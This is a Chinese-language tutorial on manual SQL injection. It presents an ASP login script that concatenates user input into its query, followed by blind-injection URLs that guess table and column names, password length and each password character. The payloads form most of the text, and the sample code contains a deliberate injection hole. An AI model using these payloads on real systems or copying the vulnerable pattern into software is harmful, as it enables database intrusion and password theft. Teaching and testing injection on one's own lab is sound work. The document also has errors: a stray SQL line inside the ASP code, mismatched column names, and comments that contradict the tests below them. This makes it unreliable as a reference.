SQL手工注入测试

login.html

 

   

          请输入密码：
          


          用 户：
          

          密 码：
          

          
  
 

login.asp

<%
inname=Request("name")
inpass=Request("pass")

set conn=server.createobject("ADODB.CONNECTION")
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")
sqlstr="SELECT * FROM data Where uname='" & inname & "'"

select * from data where name = 'admin' and 1=1 and 'a'='a'
Set rs=conn.Execute(sqlstr)

if inpass=rs("pass") then	
  response.write("
登录成功！
")
  response.write("用户编号：" & rs("uid") & "
")
else
  response.write("登录失败！")
end if

Set rs=Nothing
conn.close
%>

参数： http://192.168.10.1/login.asp?pass=test&name=test

原SQL语句：SELECT * FROM data Where uname='test'

1.构造能执行的SQL语句

http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功，1=1就是我们可能执行的SQL语句

2.猜表名

将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'

3.猜用户名字段

(select count(name) from data)>0

4.猜密码字段

(select count(pass) from data)>0

5.猜密码长度

//判断密码长度大于1

(Select count(*) from data where name='admin' and len(pass)>1)>0  

//判断密码长度大于10

(Select count(*) from data where name='admin' and len(pass)<10)>0

6.逐位猜密码

//猜测第1位密码是否为数字
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0

//猜测第1位密码是否为字母

(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0

//猜测第1位密码是否等于c

(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0